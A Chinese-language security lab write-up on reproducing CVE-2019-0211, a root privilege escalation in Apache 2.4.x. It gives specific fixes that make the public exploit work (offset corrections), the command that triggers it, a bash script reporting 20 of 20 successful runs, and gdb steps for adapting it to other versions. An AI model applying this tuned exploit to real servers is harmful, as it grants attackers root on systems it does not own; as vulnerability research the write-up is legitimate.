作者:LoRexxar’@知道创宇404实验室
时间:2019年4月19日
英文版本:https://paper.seebug.org/927/
如果你想第一时间了解漏洞资讯,可以关注我们的知道创宇Paper:https://paper.seebug.org/889/
本月Apache被公布了一个提权的漏洞,并且前天在GitHub上公布出了利用脚本,这几天我负责漏洞应急这个漏洞。
本篇文章没有叫:《Apache 提权漏洞分析》是因为我觉得CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation这篇文章的分析写的挺好的,所以我没必要再翻译一遍了,本篇文章主要叙述复现该漏洞的过程中踩过的坑。
我使用的复现环境是:
# 系统, 跟系统关系不是很大,主要问题是能不能用包管理器安装对应版本的apache
$ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
# Apache版本,复现的关键就在该版本
$ apache2 -v
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2018-03-02T02:19:31
# php版本
$ php -v
PHP 7.2.15-0ubuntu0.18.04.2 (cli) (built: Mar 22 2019 17:05:14) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.15-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
# apt install apache2=2.4.29-1ubuntu4 apache2-bin=2.4.29-1ubuntu4 apache2-utils=2.4.29-1ubuntu4 apache2-data=2.4.29-1ubuntu4
a2enmod ssl
关于需要开始ssl模块说明:
SAFE_ACCPET
的宏定义:/* On some architectures it's safe to do unserialized accept()s in the single
* Listen case. But it's never safe to do it in the case where there's
* multiple Listen statements. Define SINGLE_LISTEN_UNSERIALIZED_ACCEPT
* when it's safe in the single Listen case.
*/
#ifdef SINGLE_LISTEN_UNSERIALIZED_ACCEPT
#define SAFE_ACCEPT(stmt) (ap_listeners->next ? (stmt) : APR_SUCCESS)
#else
#define SAFE_ACCEPT(stmt) (stmt)
#endif
简单的来说,只有在apache开启多个端口的情况下,才会生成mutex互斥锁,而在github上公布的exp就是通过apache的mutex对象来进行利用的。
我试过了很多版本,没有一个版本是能直接使用Github上的exp的,在上述表面的版本中,经过调试研究发现了两个问题导致了利用失败:
$all_buckets = $i - 0x10
计算出问题$bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2)
; 计算出问题第一个计算all_buckets
的地址,使用gdb进行调试,你会发现,这个值并没有算错,但是在执行apache2ctl graceful
命令以后,all_buckets
生成了一个新的值,不过只和之前的all_buckets
地址差0x38000
,所以这个问题很好解决:
$all_buckets = $i - 0x10 + 0x38000;
第二个计算没必要这么复杂,而且在我测试的版本中还是算的错误的地址,直接改成:
$bucket_index = $bucket_index_middle;
我的payload是:curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/2323232"
表面上看是执行成功了,但是却并没有在/tmp目录下发现2323232文件,经过随后的研究发现,systemd重定向了apache的tmp目录,执行下$find /tmp -name "2323232"
就找到文件了,不过只有root用户能访问。如果不想让systemd重定向tmp目录也简单:
$ cat /lib/systemd/system/apache2.service
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target
[Service]
Type=forking
Environment=APACHE_STARTED_BY_SYSTEMD=true
ExecStart=/usr/sbin/apachectl start
ExecStop=/usr/sbin/apachectl stop
ExecReload=/usr/sbin/apachectl graceful
PrivateTmp=false
Restart=on-abort
[Install]
WantedBy=multi-user.target
这项为false就好了,PrivateTmp=false
,改完以后重启一下,再测试一遍就能在tmp目录下写文件了
在exp的注释中看到了说该利用没法100%成功,有失败的概率,所以我写了个脚本进行测试:
root@vultr:~# cat check
#!/bin/bash
SUCC=0
COUNT=0
for i in $(seq 1 20)
do
let COUNT+=1
/etc/init.d/apache2 stop
sleep 1
/etc/init.d/apache2 start
if [ -f "/tmp/1982347" ];then
rm /tmp/1982347
fi
curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/1982347"
apache2ctl graceful
sleep 1
if [ -f "/tmp/1982347" ];then
let SUCC+=1
fi
done
echo "COUNT: $COUNT"
echo "SUCCESS: $SUCC"
我测试的跑了20次的结果:
# ./check
......
COUNT: 20
SUCCESS: 20
并没有遇到失败的情况
其他版本的还没有进行测试,但是在这里给一些建议。
这个挺简单的,执行完exp以后,有输出对应的pid和all_buckets地址,可以使用gdb attach上去检查下该地址是否正确:p all_buckets
PS:这里要注意下,需要安装dbg包,才有all_buckets符号 :apt install apache2-dbg=2.4.29-1ubuntu4
如果有问题,就调试检查exp中搜索all_buckets地址的流程
如果没问题,就使用gdb attach主进程(root权限的那个进程),然后断点下在make_child
,然后执行apache2ctl graceful
,执行完然后在gdb的流程跳到make_child函数的时候,再输出一次:p all_buckets
,和exp获取的值对比一下,如果一样就没问题了
前面的流程和上面一样,重点关注在make_child函数中的my_bucket赋值的代码:3
这里注意下,因为上面有一个fork,所以在gdb里还要加一句:set follow-fork-mode child
my_bucket
的值是一个指针,指向堆喷的地址,如果my_bucket
的值没问题,exp基本就没问题了,如果不对,就调整$bucket_index
debian 9测试成功:
# cat /etc/issue
Debian GNU/Linux 9 \n \l
# apache2 -v
Server version: Apache/2.4.25 (Debian)
Server built: 2018-11-03T18:46:19
# php -v
PHP 7.0.33-0+deb9u3 (cli) (built: Mar 8 2019 10:01:24) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
with Zend OPcache v7.0.33-0+deb9u3, Copyright (c) 1999-2017, by Zend Technologies
本文由 Seebug Paper 发布,如需转载请注明来源。
欢迎关注我和专栏,我将定期搬运技术文章~
也欢迎访问我们:知道创宇云安全 :https://www.yunaq.com/?from=CSDN90903
如果你想与我成为朋友,欢迎加微信kcsc818~